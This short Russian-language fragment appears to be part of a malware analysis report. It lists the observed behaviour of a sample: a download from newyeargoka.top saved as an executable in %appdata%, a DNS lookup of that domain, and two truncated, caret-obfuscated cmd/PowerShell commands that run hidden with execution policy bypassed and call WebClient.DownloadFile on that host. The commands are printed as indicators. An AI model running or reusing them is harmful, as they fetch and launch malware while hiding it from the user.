Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoWeRshELL.^E^xe ^-EXe^C^utIo^n^PO^l^i^CY^ Bypass -Nopr^O^FIle -w^INdOw^styL^E ^Hidd^E^N^ (Ne^w-o^bJEc^T^ SySTe^M.nE^T.W^E^bCLie^N^t).^DowN^LoA^dF^IL^E(^'http://newyeargoka.top/r...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /C "PoWeRshELL.^E^xe ^-EXe^C^utIo^n^PO^l^i^CY^ Bypass -Nopr^O^FIle -w^INdOw^styL^E ^Hidd^E^N^ (Ne^w-o^bJEc^T^ SySTe^M.nE^T.W^E^bCLie^N^t).^DowN^LoA^dF^IL^E(^'http://newyeargoka.top/r...' (со скрытым окном)